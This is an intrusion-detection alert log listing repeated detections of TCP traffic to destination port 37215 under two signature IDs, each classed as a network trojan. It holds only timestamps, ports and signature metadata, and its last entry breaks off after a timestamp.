          Timestamp:06/08/24-15:05:29.044860
          SID:2835222
          Source Port:52004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113604
          SID:2835222
          Source Port:50550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175190
          SID:2835222
          Source Port:40816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.829395
          SID:2829579
          Source Port:58994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468120
          SID:2835222
          Source Port:44800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127425
          SID:2835222
          Source Port:42030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130577
          SID:2835222
          Source Port:58118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707760
          SID:2835222
          Source Port:41776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731360
          SID:2829579
          Source Port:57098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352930
          SID:2829579
          Source Port:50420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174285
          SID:2829579
          Source Port:37652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495986
          SID:2835222
          Source Port:48308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846750
          SID:2829579
          Source Port:41020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257201
          SID:2829579
          Source Port:45486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020990
          SID:2829579
          Source Port:59906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242909
          SID:2829579
          Source Port:41230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446042
          SID:2829579
          Source Port:50744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468664
          SID:2829579
          Source Port:42124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395341
          SID:2835222
          Source Port:34946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460619
          SID:2835222
          Source Port:48340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.801154
          SID:2835222
          Source Port:47880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894743
          SID:2829579
          Source Port:42458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706427
          SID:2829579
          Source Port:37560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708195
          SID:2829579
          Source Port:34950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.895794
          SID:2829579
          Source Port:48498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020786
          SID:2829579
          Source Port:50620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128776
          SID:2835222
          Source Port:53846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191668
          SID:2829579
          Source Port:57062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273155
          SID:2835222
          Source Port:56498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466599
          SID:2835222
          Source Port:56840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067976
          SID:2835222
          Source Port:59370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238546
          SID:2835222
          Source Port:37376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549867
          SID:2829579
          Source Port:60386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705266
          SID:2835222
          Source Port:58746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039634
          SID:2829579
          Source Port:52374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.598533
          SID:2835222
          Source Port:52602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599640
          SID:2829579
          Source Port:35626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263643
          SID:2829579
          Source Port:48586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264573
          SID:2829579
          Source Port:48050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353672
          SID:2829579
          Source Port:37728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407739
          SID:2829579
          Source Port:48878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860343
          SID:2829579
          Source Port:59374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495895
          SID:2829579
          Source Port:57338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161175
          SID:2835222
          Source Port:48332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820809
          SID:2835222
          Source Port:38104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896563
          SID:2829579
          Source Port:47930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239650
          SID:2829579
          Source Port:48560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517541
          SID:2835222
          Source Port:58674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115177
          SID:2829579
          Source Port:47026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356896
          SID:2829579
          Source Port:56268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.079765
          SID:2829579
          Source Port:48712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236386
          SID:2835222
          Source Port:42368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.152556
          SID:2835222
          Source Port:39546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043062
          SID:2835222
          Source Port:55552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014996
          SID:2829579
          Source Port:38774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403701
          SID:2829579
          Source Port:54402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109355
          SID:2829579
          Source Port:33278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266041
          SID:2829579
          Source Port:37078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894612
          SID:2835222
          Source Port:38092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732502
          SID:2829579
          Source Port:50750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671619
          SID:2829579
          Source Port:43204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173725
          SID:2829579
          Source Port:40274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846338
          SID:2829579
          Source Port:39344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542710
          SID:2835222
          Source Port:59908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035090
          SID:2835222
          Source Port:53932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160275
          SID:2835222
          Source Port:50316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731889
          SID:2835222
          Source Port:46502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115478
          SID:2829579
          Source Port:56870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808222
          SID:2829579
          Source Port:35956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174041
          SID:2829579
          Source Port:47628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242512
          SID:2835222
          Source Port:52370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599398
          SID:2829579
          Source Port:39516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018223
          SID:2829579
          Source Port:59732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270705
          SID:2829579
          Source Port:45586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731654
          SID:2835222
          Source Port:60730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817391
          SID:2835222
          Source Port:38334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806841
          SID:2835222
          Source Port:42506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108769
          SID:2829579
          Source Port:33258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242255
          SID:2829579
          Source Port:43040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911333
          SID:2829579
          Source Port:40572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606578
          SID:2835222
          Source Port:33974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020923
          SID:2829579
          Source Port:50544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.737050
          SID:2835222
          Source Port:38058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157590
          SID:2829579
          Source Port:53148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.158084
          SID:2835222
          Source Port:43400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513287
          SID:2835222
          Source Port:56312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513147
          SID:2829579
          Source Port:58022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160848
          SID:2829579
          Source Port:40634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113973
          SID:2829579
          Source Port:58078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017677
          SID:2829579
          Source Port:52576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108374
          SID:2835222
          Source Port:58296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107607
          SID:2835222
          Source Port:40218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783935
          SID:2835222
          Source Port:50586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020217
          SID:2829579
          Source Port:48602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133115
          SID:2829579
          Source Port:44278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670443
          SID:2829579
          Source Port:55074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461387
          SID:2835222
          Source Port:57194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.893831
          SID:2835222
          Source Port:55806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732040
          SID:2829579
          Source Port:59002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180640
          SID:2829579
          Source Port:56344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444541
          SID:2835222
          Source Port:46896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176770
          SID:2835222
          Source Port:35684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730628
          SID:2835222
          Source Port:45192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353507
          SID:2829579
          Source Port:38208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.666959
          SID:2829579
          Source Port:35530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733652
          SID:2829579
          Source Port:34658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191631
          SID:2835222
          Source Port:58738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.794775
          SID:2829579
          Source Port:34150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740141
          SID:2829579
          Source Port:35664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162776
          SID:2829579
          Source Port:42842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742355
          SID:2835222
          Source Port:56876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115763
          SID:2835222
          Source Port:57358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264462
          SID:2835222
          Source Port:50278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240416
          SID:2835222
          Source Port:36718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353965
          SID:2835222
          Source Port:34788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602811
          SID:2835222
          Source Port:36630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.464800
          SID:2835222
          Source Port:49542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600912
          SID:2829579
          Source Port:43802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042171
          SID:2829579
          Source Port:36298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175186
          SID:2835222
          Source Port:33586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546716
          SID:2835222
          Source Port:41882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264261
          SID:2835222
          Source Port:54548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153802
          SID:2829579
          Source Port:34002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396173
          SID:2829579
          Source Port:45198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239821
          SID:2829579
          Source Port:41408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043684
          SID:2835222
          Source Port:45716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730870
          SID:2829579
          Source Port:56796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180305
          SID:2835222
          Source Port:39576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808709
          SID:2835222
          Source Port:46922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786465
          SID:2829579
          Source Port:43432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.829794
          SID:2835222
          Source Port:47994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672587
          SID:2829579
          Source Port:52978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820665
          SID:2829579
          Source Port:47990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.183825
          SID:2829579
          Source Port:49724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272065
          SID:2835222
          Source Port:55748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160911
          SID:2835222
          Source Port:52504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896116
          SID:2835222
          Source Port:48478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854099
          SID:2829579
          Source Port:49114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731382
          SID:2829579
          Source Port:58136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176678
          SID:2829579
          Source Port:60738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352434
          SID:2829579
          Source Port:54856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.165912
          SID:2835222
          Source Port:59648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709496
          SID:2835222
          Source Port:37216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788808
          SID:2829579
          Source Port:42046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.055437
          SID:2829579
          Source Port:42634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743103
          SID:2835222
          Source Port:59120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353107
          SID:2835222
          Source Port:32874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261356
          SID:2829579
          Source Port:34024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512760
          SID:2835222
          Source Port:53496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.293222
          SID:2835222
          Source Port:47268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020819
          SID:2829579
          Source Port:57824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350710
          SID:2829579
          Source Port:44088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099542
          SID:2829579
          Source Port:35844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600300
          SID:2829579
          Source Port:53808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352882
          SID:2835222
          Source Port:52154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.061853
          SID:2829579
          Source Port:55100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466158
          SID:2835222
          Source Port:42796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.026065
          SID:2829579
          Source Port:45324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.401986
          SID:2829579
          Source Port:56628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892520
          SID:2829579
          Source Port:47020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159402
          SID:2835222
          Source Port:53708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161664
          SID:2829579
          Source Port:41674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306696
          SID:2835222
          Source Port:39516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238509
          SID:2829579
          Source Port:34604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855444
          SID:2829579
          Source Port:51206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912195
          SID:2829579
          Source Port:49078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514262
          SID:2835222
          Source Port:44710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708511
          SID:2835222
          Source Port:33422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744013
          SID:2829579
          Source Port:54578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264502
          SID:2829579
          Source Port:49468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238100
          SID:2829579
          Source Port:45190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602656
          SID:2835222
          Source Port:36336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.294880
          SID:2835222
          Source Port:49134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.022095
          SID:2829579
          Source Port:57470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858352
          SID:2829579
          Source Port:34454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037043
          SID:2835222
          Source Port:49600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133803
          SID:2829579
          Source Port:51944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896022
          SID:2829579
          Source Port:60660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.179738
          SID:2835222
          Source Port:39136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470457
          SID:2835222
          Source Port:57412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107506
          SID:2835222
          Source Port:59584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.078870
          SID:2829579
          Source Port:47080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516868
          SID:2829579
          Source Port:36930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129454
          SID:2829579
          Source Port:51162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273147
          SID:2829579
          Source Port:34870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353309
          SID:2829579
          Source Port:60632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.737988
          SID:2829579
          Source Port:35540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.794175
          SID:2835222
          Source Port:53528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.747032
          SID:2835222
          Source Port:55854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.841710
          SID:2829579
          Source Port:51468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005662
          SID:2829579
          Source Port:40596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.172543
          SID:2835222
          Source Port:52668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159100
          SID:2829579
          Source Port:50854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129344
          SID:2835222
          Source Port:54070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733904
          SID:2829579
          Source Port:42972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135577
          SID:2835222
          Source Port:40742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600956
          SID:2835222
          Source Port:46956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257983
